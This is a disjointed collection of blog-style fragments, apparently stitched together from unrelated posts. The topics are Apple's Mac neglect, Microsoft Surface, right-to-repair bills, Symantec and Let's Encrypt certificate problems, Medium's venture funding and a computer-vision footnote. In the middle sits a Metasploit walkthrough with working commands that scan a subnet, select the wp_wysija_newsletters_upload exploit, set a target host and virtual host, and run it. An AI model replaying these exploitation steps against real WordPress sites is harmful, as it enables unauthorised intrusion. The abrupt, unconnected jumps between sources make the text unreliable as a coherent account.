And amid all of these delays and misses, Bloomberg reports that the Mac team is in trouble, having "lost clout" with Jonathan Ive and the company’s software team—even though Tim Cook promises Apple hasn't forgotten about the Mac. But you don’t need Mark Gurman’s insider sources when you can spot the wreck from the sky. The Mac Pro—the flagship of Apple desktop hardware—hasn’t been updated since 2013 (not even with a faster processor option).
Microsoft, smelling blood in the water, has given up on phones but focused on the future of the laptop and desktop. Its Surface line is not only selling well to the mainstream, it’s experimenting aggressively to score the Photoshopping, Maya-ing, and AutoDesk-ing market, too. After fighting a 10-year losing battle against Apple on almost everything it does, Microsoft is going for the blind spot Apple now takes for granted: the creative class.
The bills are squarely aimed at the “authorized repair” model that creates aftermarket monopolies dominated by the manufacturers themselves. For example, Apple has never authorized an independent company to repair iPhones, even though hundreds of companies do so every day (its authorized repair program is only for Mac computers).
A security researcher has unearthed evidence showing that three browser-trusted certificate authorities (CAs) owned and operated by Symantec improperly issued more than 100 unvalidated transport layer security certificates. In some cases, those certificates made it possible to spoof HTTPS-protected websites.
By December 8, 2016, Let's Encrypt had issued 409 certificates containing “Paypal” in the hostname; that number is up to 709 as of this morning. Other targets include BankOfAmerica (14 certificates), Apple, Amazon, American Express, Chase Bank, Microsoft, Google, and many other major brands. LetsEncrypt validates only that (at one point in time) the certificate applicant can publish on the target domain; the CA also grudgingly checks with the SafeBrowsing service to see if the target domain has already been blocked as malicious, although they “disagree” that this should be their responsibility. Let's Encrypt’s short position paper is worth a read; many reasonable people agree with it.
msf > db_nmap -v -sV 192.168.111.xxx
This will save the results to the metasploit database
msf > nmap -v -sV 192.168.111.0/24 -oA subnet_1
hostswill list all the hosts found by
hosts -Rwill add them to the list of hosts to exploit.
msf > search name:wordpress
This will select an exploit to use:
msf > use exploit/unix/webapp/wp_wysija_newsletters_upload
This will show you the attacks that the exploit will take advantage of:
msf exploit(wp_wysija_newsletters_upload) > show payloads
This will show what software and version will be targeted:
msf exploit(wp_wysija_newsletters_upload) > show targets
Exploit targets: Id Name -- ---- 0 wysija-newsletter < 2.6.8
msf exploit(wp_wysija_newsletters_upload) > show options
Module options (exploit/unix/webapp/wp_wysija_newsletter_upload): Name Current Settings Required Description ---- ---------------- -------- ----------- Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOST no The target address RPORT 80 yes The target port SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI / no The base path to the wordpress application VHOST no HTTP server virtual host Exploit target: Id Name -- ---- 0 wysija-newsletters < 2.6.8
Here is where we set all the options:
msf exploit(wp_wysija_newsletters_upload) > set RHOST 188.8.131.52 msf exploit(wp_wysija_newsletters_upload) > set RPORT 443 msf exploit(wp_wysija_newsletters_upload) > set SSL true msf exploit(wp_wysija_newsletters_upload) > set VHOST myles.life
msf exploit(wp_wysija_newsletters_upload) > exploit
Wow, that was way easier than I thought it would be.
Although, I guess so is everything.
I made this Editoral template to publish Jekyll posts from my iPad or iPhone.
But I don’t think we’ll grow old together, Medium and I. I suspect it’ll end quite tragic, actually. $132,000,000 is a lot of money after all, and that’s how much venture capital Medium has been dipped in. Before having a prayer or a song about how to turn into that multi-billion-dollar business it must to satisfy the required rate of return.
It’s just that in Silicon Valley, you can’t merely make a better typewriter and sell that at a profit. No, you have to DISRUPT. You have to REINVENT. Well, at least you need the appearance of that, while you squeeze eyeballs until they pop out enough advertising dollars to give the VCs that 10x return.
Computer vision is a field that deals with how computers can be made to gain high-level understanding from digital images or videos.↩